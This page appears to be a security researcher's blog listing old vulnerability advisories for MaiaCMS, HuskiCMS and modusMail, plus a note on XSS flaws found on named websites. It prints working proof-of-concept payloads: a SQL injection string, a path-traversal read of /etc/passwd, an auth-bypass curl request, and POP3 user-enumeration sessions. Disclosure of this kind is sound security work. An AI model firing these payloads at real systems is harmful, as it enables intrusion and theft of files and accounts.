Results tagged “advisory” from Just Another Hacker

--------------------------------------------------------------------------------------------
20100625 - Justanotherhacker.com : Multiple vulnerabilities in maiacms
JAHx103 - http://www.justanotherhacker.com/advisories/JAHx103.txt
--------------------------------------------------------------------------------------------

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: http://maiacms.sourceforge.net/ ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms, here are some of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
PoC:
/index.php?page=1' or 'a'='a

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.
PoC:
/admin/index.php?com=../../../../../../../../etc/passwd%00

--- Authentication bypass ---
Most of the admin pages has a check and redirect to login snippet to validate login:
list_pages.php:1:<?php
list_pages.php:2:    require ("../includes/connections.php"); //Includes functions and database connection
list_pages.php:3:    
list_pages.php:4:    if (empty($is_admin)) {
list_pages.php:5:        header("Location: login.php");
list_pages.php:6:    }
However it does not halt execution after the header redirect. This allows code to be executed past the point of redirection.

PoC:
curl 'http://maiacms.sourceforge.net/admin/list_pages.php?id=1&category=1'

--- Session control ---
The script update_session.php relies on the the afroementioned access control weakness and allows the session data to be changed or created directly through a HTTP POST operation.
update_session.php:1:<?php
update_session.php:2:require_once("../includes/connections.php");
update_session.php:3:
update_session.php:4:if (empty($is_admin)) {
update_session.php:5:        header("Location: /admin/login.php");
update_session.php:6:    }
update_session.php:7:    
update_session.php:8:foreach ($_POST as $key => $value) {
update_session.php:9:    $_SESSION[$key] = $value;
update_session.php:10:}
update_session.php:11:
update_session.php:12:$db->Close();
update_session.php:13:?>

--- Solution ---
Wait for the next or non alpha release

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : HuskiCMS local file inclusion
JAHx102 - http://www.justanotherhacker.com/advisories/JAHx102.txt
--------------------------------------------------------------------------------------------

HuskiCMS
huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS
[ Taken from: http://www.huskicms.com ]


--- Vulnerability description ---
A conditional local file inclusion exists in the image resizing script size.php's i parameter.
The parameter is not filtered and allows arbitrary file inclusion.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
    header ('Content-Type: text/html; charset=utf-8');
    // Data Includes
    include_once "PHPLib/db_mysql.inc";
    include_once "Data/dbConnection.class.php";
    include_once "Data/dbConfig.class.php";
    include_once "Data/dataAdapter.class.php";
    include_once "Quicksite/Core/domxml.class.php";


    // Quicksite Core Includes
    include_once "Quicksite/Core/all.inc.php";
    
    // Configuration
    include_once "Quicksite/db.config.php";
    include_once "inc/vars.config.php";

    // Initialise the Site
    $site = new Site($_VARS['site']);
    print_r($_SESSION['login']);
    // Initialise the Page
    $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

    // Load plugin sources
    $page->loadPluginSources();
   
    // Create the Page
    $page->createPage();
   
    echo $page->Result;
?>


--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email
 

I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately even though XSS is old news in the security community and there are well established techniques to mitigate the attack it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.

Get all the details after the break, or use the quick links below

businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stays.com.au
three.com.au
thebigchair.com.au

These are the vulnerabilities published by justanotherhacker.com;

Site specific vulnerabilities are reported at

• http://bugtraq.byethost22.com/search.php?reper=wireghoul
• xssed
  

Advisory	Date	Subject	Media
JAHx103	20100205	Multiple vulnerabilities in maiacms	.txt
JAHx102	20100205	HuskiCMS local file inclusion	.txt
JAHx101	20100205	Huski retail multiple SQL injection vulnerabilities	.txt
JAHx091	20091106	Vircom vopmail / modusmail information disclosure	.txt

--------------------------------------------------------------------------------------------
20091106 - Justanotherhacker.com : Vircom vopmail / modusmail  information disclosure
JAHx091 - http://www.justanotherhacker.com/advisories/JAHx091.txt
--------------------------------------------------------------------------------------------

modusMail
All in one email security solution

The modusMail™ mail server provides all-in-one email services, messaging security and spam protection.
[ Taken from: http://www.vircom.com/en/products/modusmail/ ]


--- Vulnerability description ---
A conditional information disclosure exists in older versions of modusMail and Vopmail that will disclose whether an email account exists or not. The disclosure is conditional upon the presence of a @ or % character in the username. This is usually used when one mail system is responsible for the email of several domains. If the @ or % character was not present in the username the pop3 server would request a password before rejecting the login, as opposed to aborting the login attempt after receiving the user portion of the login.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Information disclosure
Severity: Low
Release: Responsible
CVE: None
Vendor: Vircom - http://www.vircom.com
Affected versions:
Modus mail <= 4.4.491
Probably all versions of Vopmail


--- Proof of Concept ---

~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready
<mailto:37819600.1156428713.245@vircom.com>
<37819600.1156428713.245@vircom.com>
user nosuchuserhere
+OK nosuchuserhere is welcome here
quit

+OK vircom.com POP3 server signing off (mailbox empty)

Connection closed by foreign host.


~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready
<mailto:36899224.1156429893.504@vircom.com>
<36899224.1156429893.504@vircom.com>
user nosuchuser@nosuchhost.com
-ERR nosuchuser@nosuchhost.com not known
user nosuchuser%nosuchhost.com
-ERR nosuchuser%nosuchhost.com not known
quit
+OK vircom.com POP3 server signing off (mailbox empty)
Connection closed by foreign host.

--- Solution ---
Upgrade to a more recent version


--- Disclosure time line ---
06-Nov-2009 - Public disclosure
15-Sep-2006 - New version of modusMail mitigate this
26-Aug-2009 - Vendor acknowledge problem
19-Aug-2006 - Vendor notified through email

It's that time of the year, and this christmas we're all giving away old bugs.
So here is an advisory that never made it, until now.

Vircom vopmail / modusmailinformation disclosure